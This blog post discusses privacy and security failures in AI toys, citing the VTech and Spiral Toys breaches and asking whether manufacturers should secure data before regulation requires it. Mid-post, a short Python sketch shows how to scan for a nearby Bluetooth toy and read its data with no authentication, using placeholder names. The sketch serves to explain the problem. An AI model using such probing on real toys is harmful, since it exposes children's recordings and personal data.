Who is responsible for the data collected by toys?

The topic I have been blogging about is Artificial Intelligence in toys, and while writing these posts I have been reading a lot of articles and watching a lot of videos on the subject. One of the recurring themes in many of them is privacy and security concerns. There have been several notable security breaches in the world of AI toys; two of the most notable are VTech, where 4,854,209 parent accounts and 6,368,509 related kid profiles were hacked, and Spiral Toys, which had 2.2 million children’s voice recordings and accounts exposed. Troy Hunt, the security expert credited with identifying the VTech security flaws, explains that many toys capable of performing AI functions lack sufficient security and are vulnerable to hackers. Many of the same vulnerabilities that face the Internet of Things also face the “Internet of Toys”: microphones, cameras, and personal data can be accessed, giving hackers the ability to match images, names, and home addresses to children. Hunt explains that hackers can gain control of toys through internet and Bluetooth connections, which lets them reach a device remotely or from close proximity, as the sketch below illustrates. After several large-scale data breaches, consumer rights groups and privacy advocates have begun to file complaints alleging that certain toy manufacturers have violated government data privacy standards such as COPPA, the Children’s Online Privacy Protection Act, which is aimed at protecting consumers. Government agencies and universities have published studies discussing the security vulnerabilities in the “Internet of Toys,” but there is currently a lack of regulation and oversight for manufacturers creating AI toys.
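To make the Bluetooth side of that attack surface concrete, here is a minimal sketch of how a connected toy that performs no pairing or authentication could be read by anyone within radio range. It assumes a hypothetical toy: the advertised device name, the characteristic UUID, and the use of the Python bleak library are my own illustrative choices, not details taken from any of the reported breaches.

```python
"""Minimal sketch: probing a nearby Bluetooth LE toy for unauthenticated access.

Assumes the `bleak` library (pip install bleak). The toy name and the
characteristic UUID below are hypothetical placeholders.
"""
import asyncio
from bleak import BleakScanner, BleakClient

TOY_NAME = "SmartToy"  # hypothetical advertised name of the toy
AUDIO_CHAR_UUID = "0000ffe1-0000-1000-8000-00805f9b34fb"  # hypothetical characteristic


async def main():
    # Scan for nearby BLE devices; an insecure toy advertises itself openly.
    devices = await BleakScanner.discover(timeout=5.0)
    toy = next((d for d in devices if d.name and TOY_NAME in d.name), None)
    if toy is None:
        print("No toy found in range.")
        return

    # If the toy requires no pairing or authentication, any client within
    # radio range can simply connect and read its characteristics.
    async with BleakClient(toy.address) as client:
        data = await client.read_gatt_char(AUDIO_CHAR_UUID)
        print(f"Read {len(data)} bytes without any authentication step.")


if __name__ == "__main__":
    asyncio.run(main())
```

The point of the sketch is not the specific library calls but the absence of any credential check: nothing in the flow above requires the attacker to prove they are the child's parent or the toy's owner.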

This situation raises some interesting ethical questions. Given that information about these security risks is widely available, do toy manufacturers have a social responsibility to be proactive in implementing security standards and protocols? Or should they wait until there are laws requiring them to address security concerns? Proactively implementing security standards and protocols increases production costs, because extra time and resources are needed to identify security risks and to prevent or fix them. However, not addressing the security concerns puts customers at risk. The lawmaking process can be slow, and laws may take a long time to implement, so it is possible that legislation will not keep up with the fast-paced world of computer science. If the laws do not reflect the latest security flaws, then manufacturers who build only to those standards will always be vulnerable to any new threat the laws do not address. The security flaws in AI toys may put children in danger by giving hackers access to their voice recordings, photos, videos, and personal information such as phone numbers or home addresses. To make matters more complex, there are currently no laws requiring toy manufacturers to disclose how their data is being secured or what it is being used for. This means there is no way for parents to know whether their data, or their children’s data, is being protected.
